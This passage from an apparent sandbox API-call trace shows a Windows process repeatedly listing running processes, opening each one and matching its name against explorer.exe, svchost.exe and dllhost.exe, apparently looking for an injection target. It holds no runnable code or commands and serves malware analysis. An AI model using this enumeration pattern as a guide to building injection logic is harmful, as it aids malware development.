returned 1 [0235.398] CloseHandle (hObject=0xec) returned 1 [0235.398] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0235.399] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0235.399] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0235.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0235.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0235.399] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.399] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.399] CloseHandle (hObject=0xec) returned 1 [0235.399] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0235.399] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0235.399] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0235.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0235.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0235.400] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.400] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.400] CloseHandle (hObject=0xec) returned 1 [0235.400] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0235.400] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0235.400] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0235.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0235.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0235.400] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.400] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.401] CloseHandle (hObject=0xec) returned 1 [0235.401] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0235.401] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0235.401] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0235.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0235.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0235.401] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.401] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.401] CloseHandle (hObject=0xec) returned 1 [0235.401] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0235.401] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0235.401] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0235.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0235.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0235.402] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.402] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.402] CloseHandle (hObject=0xec) returned 1 [0235.402] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0235.402] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0235.402] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0235.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0235.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0235.403] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.403] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.403] CloseHandle (hObject=0xec) returned 1 [0235.403] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0235.403] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0235.403] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0235.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0235.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0235.403] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.403] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.403] CloseHandle (hObject=0xec) returned 1 [0235.403] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0235.403] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0235.403] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0235.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0235.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0235.404] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.404] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.404] CloseHandle (hObject=0xec) returned 1 [0235.404] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0235.404] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0235.404] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0235.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0235.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0235.405] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.405] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.405] CloseHandle (hObject=0xec) returned 1 [0235.405] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0235.405] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0235.405] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0235.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0235.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0235.405] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.405] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.405] CloseHandle (hObject=0xec) returned 1 [0235.405] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0235.405] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0235.405] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0235.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0235.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0235.406] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.406] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.406] CloseHandle (hObject=0xec) returned 1 [0235.406] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0235.406] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0235.406] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0235.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0235.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0235.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.407] CloseHandle (hObject=0xec) returned 1 [0235.407] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0235.407] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0235.407] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0235.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0235.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0235.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.407] CloseHandle (hObject=0xec) returned 1 [0235.407] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0235.407] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0235.408] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0235.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0235.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0235.408] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.408] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.408] CloseHandle (hObject=0xec) returned 1 [0235.408] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0235.408] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0235.408] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0235.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0235.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0235.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.409] CloseHandle (hObject=0xec) returned 1 [0235.409] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0235.409] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0235.409] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0235.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0235.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0235.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.409] CloseHandle (hObject=0xec) returned 1 [0235.410] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0235.410] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0235.410] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0235.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0235.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0235.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0235.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0235.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0235.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0235.413] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.413] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.413] CloseHandle (hObject=0xec) returned 1 [0235.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0235.413] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.413] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.413] CloseHandle (hObject=0xec) returned 1 [0235.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0235.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0235.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.414] CloseHandle (hObject=0xec) returned 1 [0235.414] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0235.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0235.415] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.415] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.415] CloseHandle (hObject=0xec) returned 1 [0235.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0235.416] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.416] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.416] CloseHandle (hObject=0xec) returned 1 [0235.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0235.416] CloseHandle (hObject=0xe8) returned 1 [0235.416] Sleep (dwMilliseconds=0x3e8) [0236.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0236.428] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0236.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0236.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0236.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0236.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0236.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0236.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0236.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0236.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0236.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0236.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0236.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0236.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, 